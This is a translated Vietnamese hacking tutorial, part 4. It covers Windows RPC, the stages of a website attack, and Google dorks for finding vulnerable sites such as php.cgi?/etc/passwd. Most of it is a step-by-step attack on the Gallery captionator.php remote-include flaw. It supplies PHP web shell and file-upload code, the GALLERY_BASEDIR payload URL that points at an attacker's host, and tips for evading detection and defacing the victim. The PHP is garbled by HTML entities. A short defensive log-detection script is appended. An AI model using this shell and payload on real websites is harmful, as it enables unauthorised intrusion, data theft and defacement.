The Most Basic Understanding to Become a Hacker - Part 4


26. Learn about Remote Procedure Call (RPC)

Windows NT provides the ability to use RPC to execute distributed applications. Microsoft RPC includes libraries and services that allow distributed applications to run in a Windows NT environment. Major distributed applications include multiple execution processes with specific tasks. These processes can run on one or more computers.

Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must be associated with the Microsoft RPC name service interface (NSI). NSI includes API functions that allow access to multiple entities in the same name service database (the name service database contains entities, groups of entities, and history of entities on the server).

When Windows NT is installed, Microsoft Locator is automatically selected as the name service provider. It is the best service provider in the Windows NT network environment.

27. Simple technique to prevent unauthorized access while online via RPC (Remote Procedure Call)

If you suspect your computer has been hijacked or is being tracked by a remote administration program, just turn off Remote Procedure Call. No remote administration program currently available can then track you. It also prevents most tools from accessing the machine, because most of them connect using remote procedure call (over TCP/IP). The majority of trojans also rely on this protocol.

How to turn it off: go to Services, right-click Remote Procedure Call, set Startup type to Disabled or Manual, then click Apply.

This is a very effective way to protect your PC. If you add file sharing, it will be very difficult to hack. But on a LAN it is inconvenient, because you will not be able to run programs that depend on it. Depending on how you work, make a reasonable choice. In my opinion, if you use a LAN you should install a firewall, which is certainly relatively safe as well.

(According to the article "life as potatoes" admin - admin of HVA)

According to the list in Hacking Exposed 3, hacking a Web site usually involves the following steps:

  • FootPrinting: This is what hackers do when they want to get the maximum amount of information about a server / business / user. It includes details about the IP address, Whois, DNS, etc. It is basically the official information related to the target. Many hackers simply use search engines on the Web to find information.
  • Scanning: This is the evaluation and identification of the services that the target runs. It includes port scans, operating system identification, etc. The tools used here include nmap, WS pingPro, siphon, fscam and many more.
  • Enumeration: The third step is to look for poorly protected resources or a user account that can be used to get in. It includes default passwords, default scripts and services. Many network administrators do not know about these values or do not change them.
  • Gaining Access: Now the intruder will try to access the network with the information obtained in the three steps above. The method used here may be a buffer overflow attack, retrieving and decrypting the password file, or, crudest of all, brute-forcing (checking all cases of) the password. The tools commonly used in this step are NAT, podium, or L0pht.
  • Escalating Privileges: For example, when a hacker enters the network with a guest account, he or she will seek complete control of the system. The hacker will try to crack the admin password, or use a vulnerability to escalate privileges. John and Ripper are two great password crackers.
  • Pilfering (used when files containing passwords are exposed): Again, search engines are used to find methods for accessing the network. Text files containing passwords or other unsafe mechanisms can be a good find for a hacker.
  • Covering Tracks: Once the necessary information has been collected, the hacker attempts to erase the traces and delete the operating system's log files, so that the administrator does not recognize that the system has been compromised, or does not know who the intruder is.
  • Creating "Back Doors": Hackers leave "back doors", a mechanism that lets them get back in secretly. It takes a lot of work, either by installing a Trojan or creating a new user (for organizations with multiple users). The tools are Trojans, keyloggers and more.
  • Denial of Service (DoS): If the hacker does not succeed in penetrating, DoS is the last resort for attacking the system. If the system is not configured properly, it will break and allow the hacker to gain access. In other cases, DoS will cause the system to stop functioning. The most commonly used tools for DoS attacks are trin00, Ping of Death, teardrop, nukers and flooders. This method is very effective, and is still in widespread use today.

Depending on their knowledge and level, a hacker may skip a step. It is not necessary to follow the steps in order. Remember the saying: "Know yourself and know your enemy, and you will win a hundred battles out of a hundred."

(HVA and hackervn.net documentation)

29. How to find the faulty website

You know the Web sites that specialize in finding information online, but you probably did not expect that you can use them to find faulty Web sites. (I still use google.com and recommend that you use it too, because it is very powerful and effective.)

If you are interested in a Web page error and want to find pages that have it, just go to google.com and type that error after "allinurl:". For example, we have the following Web page fault code:

cgi-bin/php.cgi?/etc/passwd

You would type: "allinurl:cgi-bin/php.cgi?/etc/passwd"

It will list the Web pages that have this error. Look at the bottom of each listing (the green address line): if a line contains the same keyword you entered, that page has or had the error. Whether or not you can access it depends on whether the Web site has fixed this bug.

If you are interested in forum errors and want to find such a forum to practice on, just enter the keyword "powered by" followed by the forum name. For example, to find a forum using Snitz 2000: powered by Snitz 2000.

However, the chance of finding the right faulty forum or Web page this way is not high, so look at the special string in the URL that is specific to each type of site or forum (this is very important, please find out more). For example, for the Hosting Controller error the URL contains /admin, /advadmin or /hosting, so you type the keywords:

allinurl:/advadmin or allinurl:/admin or allinurl:/hosting

It will list Web pages with URLs like: http://tentrangweb.com/advadmin or http://tentrangweb.com/admin or http://tentrangweb.com/hosting.

For example, a UBB forum has the characteristic string: cgi-bin/ultimatebb.cgi?

We search for it in the same way as above. You only need to know how to search like this; after that, follow the "Security Error" update page of HVA, posted daily by LeonHart, and you will understand what the errors mean and can test them yourself.

30. Web hacking through Gallery faults (a type of php code inject error)

Gallery is a tool for creating a Web gallery of images, written in PHP. Taking advantage of this loophole, we can inject PHP code that allows us to upload files, which is our main purpose.

First of all you have to register a free host; it is easiest to register at brinkster.com. Then open Notepad and create a PHP file with the following code:

CODE
& lt;? php
global $ PHP_SELF;
echo "
& lt; form method = post action = $ PHP_SELF? $ QUERY_STRING & gt;
& lt; input type = text name = shell size = 40 & gt;
& lt; input type = hidden name = value = shell & gt;
& lt; input type = submit value = Go name = sm & gt;

set_magic_quotes_runtime (1);
if ($ act == "shell") {
echo "nnnnnnnnnnnnnnnnnnnnnnnn & lt; xmp & gt;";
system ($ shell);
echo "

nnnnnnnnnnnnnnnnnnnnnnnn ";}
echo " ";
1 & gt;

Save this code as two files with different names (but the same code):

  • shell: This file is used to run the shell on the victim host.
  • init.php: This file is for uploading to the host you have just created. (Upload this init.php file right away, because we will use it again later with different code; do not forget to upload it.)

Create a new PHP file with the following code:

CODE
& lt;? php
function handleupload () {
if (is_uploaded_file ($ _ FILES ['userfile'] ['tmp_name'])) {
$ filename = $ _FILES ['userfile'] ['tmp_name'];
print "$ filename was uploaded successfuly";
$ realname = $ _FILES ['userfile'] ['name'];
print "realname is $ realnamen";
print "copying file to uploads dir". $ realname;
copy ($ _FILES ['userfile'] ['tmp_name'], "*PATH*". $ realname); // note *PATH* we will change later
} else {
echo "Possible file upload attack: filename". $ _ FILES ['userfile'] ['name']. ".";


if ($ act == "upload") {
handleupload ();

echo "
& lt; form ENCTYPE = multipart / form-data method = post action = $ PHP_SELF? $ QUERY_STRING & gt;
File: & lt; INPUT TYPE = FILE NAME = userfile SIZE = 35 & gt;
& lt; input type = hidden name = MAX_FILE_SIZE value = 1000000 & gt;
& lt; input type = hidden name = act value = upload & gt;
& lt; input type = submit value = Upload name = sm & gt;

1 & gt;

Name it upload.php; it will be used to upload to the victim's Web site.

Go to Google, type in "Powered by gallery" and press Enter. Google will list a bunch of sites using Gallery. Pick any page and then use the following link to see whether it has the Gallery fault or not:

http://<victim's website>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/

If you see a rectangular box at the top, with a button labelled "Go" to the right of it, you have found a target. You can now type commands into the rectangle to hack the victim's Web site.

First, type "pwd" to get the absolute path of the current directory and click the "Go" button; the path is shown at the bottom (for example, the path I found was "/home/abc/xyz/gallery").

Then type "ls -al" to list its subfolders. Now look at the results: you will see the subdirectories listed. Always remember that our goal is to find a directory into which we can upload the upload.php file that we prepared earlier, so identify it with me by looking at the last word of each row of the result:

  • Eliminate the rows where the name is "." or "..", as this is the root directory or a virtual directory (they are usually the topmost rows of the result).
  • Also eliminate the rows whose names end in an extension (e.g. config.php, check.inc, etc.), as these are files rather than folders.
  • The rest are folders that can be uploaded to, but I recommend that you select rows containing a number greater than 1 (you can identify it by looking at the second column from the left), because that makes sure this is a directory and not a virtual directory, and makes it difficult for the site's admin to detect when we install our file. For example, I discovered that the folder "loveyou" contains 12 files and can be uploaded to, so the official path that we upload to will be: /home/abc/xyz/gallery/loveyou

Now go to your hosting account and edit the init.php file so that it has the same code as the upload.php file, but change *PATH* to "/home/abc/xyz/gallery/loveyou/".
Also prepare a file upload.php on your machine with *PATH* set to "" (2 quotes).

Now, so that we can upload the file upload.php to the victim's Web site, enter the following address in your Web browser:

http://<victim's website>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/

You will see a rectangular frame with two buttons next to it: a "Browse" button and an "Upload" button. The "Browse" button is used to select the upload.php file you have prepared on your computer; when you click the "Upload" button, it will upload the file upload.php to the victim's Web site. OK, you have now completed hacking the Web site. From now on, use the database and password (do the same as in the earlier hack tutorial), but you should only practice; do not delete the database or destroy their Web site. If you are a genuine hacker, uploading a Web page with the text "Hack by ...... .." is enough.

Just as in the past, whether you have success or not also depends on the luck and persistence of research using your knowledge.
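Seen from the defending side, the requests described in sections 29 and 30 stand out in a Web server access log: a query parameter such as GALLERY_BASEDIR carrying an absolute URL to another host, or a probe like php.cgi?/etc/passwd. The following Python detector is an added example, not part of the original tutorial; it assumes the Combined Log Format, and the log lines, client addresses and the site name www.example.org are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format (assumed): client - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} ')
# A parameter value that is itself an absolute URL; group 1 is its host.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://([^/:?#]+)', re.I)
# Local-file probes in the query string, e.g. php.cgi?/etc/passwd or ../ traversal.
LOCAL_FILE_RE = re.compile(r'(?:^|[/?=&])(?:etc/passwd|\.\./)', re.I)

def inspect(line, site_host):
    """Return (client, reason, detail) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, target = m.groups()
    query = urlsplit(target).query
    findings = []
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        hit = REMOTE_URL_RE.match(value.strip())
        if hit and hit.group(1).lower() != site_host.lower():
            findings.append((client, "remote-include", f"{name} -> {hit.group(1)}"))
    if LOCAL_FILE_RE.search(unquote(query)):
        findings.append((client, "local-file-probe", unquote(query)))
    return findings

def scan(lines, site_host):
    """Run inspect() over many lines and collect every finding in order."""
    return [f for line in lines for f in inspect(line, site_host)]

# Constructed sample log; the hosts and addresses are documentation-only values.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /gallery/captionator.php?GALLERY_BASEDIR=http%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Mar/2024:10:02:30 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 210',
    '192.0.2.44 - - [10/Mar/2024:10:03:00 +0000] "GET /gallery/view_album.php?set_albumName=holiday HTTP/1.1" 200 8042',
    '192.0.2.44 - - [10/Mar/2024:10:03:05 +0000] "GET /login.php?return=http://www.example.org/gallery/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "www.example.org"):
        print(finding)
```

On the server itself, PHP's `allow_url_include = Off` setting prevents include/require from loading code from a URL.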

(Based on hacking tutorials of vnofear - viethacker.net)

GOODLUCK !!!!!!!!!!!!

(End of Part 4)
Anhdenday
HVAonline.net